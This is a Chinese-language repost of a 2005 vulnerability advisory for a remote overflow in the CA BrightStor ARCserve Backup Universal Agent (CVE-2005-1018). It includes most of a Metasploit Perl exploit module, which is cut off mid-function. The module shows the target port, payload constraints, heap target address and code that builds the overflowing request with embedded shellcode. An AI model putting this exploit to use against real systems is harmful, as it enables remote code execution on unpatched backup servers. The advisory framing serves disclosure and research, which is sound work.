CA BrightStor ARCserve Backup UniversalAgent…
2008-04-09 04:21:25来源:互联网 阅读 ()
发布日期:2005-04-12
更新日期:2005-04-12
受影响系统:
Computer Associates BrightStor ARCserve Backup v11 (Win32)描述:
BUGTRAQ ID: 13102
CVE(CAN) ID: CVE-2005-1018
BrightStor ARCserve Backup可为所有级别的Windows、NetWare、Linux和UNIX服务器及Windows、Mac OS X、Linux、UNIX、AS/400和VMS客户环境提供备份,恢复防护。
BrightStor软件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在主机上执行任意指令。
BrightStor软件使用网络代理跨网络在节点上执行备份。如果在TCP端口上收到了option字段设置为0,3或1000的代理请求,且报文中该option字段前有个很大的字符串,则会发生溢出。远程攻击者可能利用这个漏洞在有漏洞的计算机上执行任意指令或导致拒绝服务的情况。
<*来源:iDEFENSE Labs (labs@idefense.com)
链接:*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::cabrightstor_uniagent;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'CA BrightStor Universal Agent Overflow',
'Version' => '$Revision: 1.13 $',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003', 'winnt' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 6050],
},
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'Keys' => [' ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland exception
results in heap growth and execution of dereferenced function pointer
at a specified address.
}),
'Refs' =>
[
['OSVDB', '15471'],
['MIL', '16'],
['URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'DefaultTarget' => 0,
'Targets' => [
['Magic Heap Target #1', 0x01625c44], # far away heap address
],
'Keys' => ['brightstor'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
# The server reverses four bytes starting at 0xa5
# my $patchy = join('', reverse(split('',substr($shellcode, 0xa5, 4))));
# substr($shellcode, 0xa5, 4, $patchy);
# Create the request
my $boom = "X" x 1024;
# Required field to trigger the fault
substr($boom, 248, 2, pack('v', 1000));
# The shellcode, limited to 250 bytes (no nulls)
substr($boom, 256, length($shellcode), $shellcode);
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
- CA BrightStor ARCserve Backup发现服务远程缓冲区溢出漏洞 2008-04-10
- CA BrightStor ARCserve Backup远程缓冲区溢出漏洞 2008-04-10
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
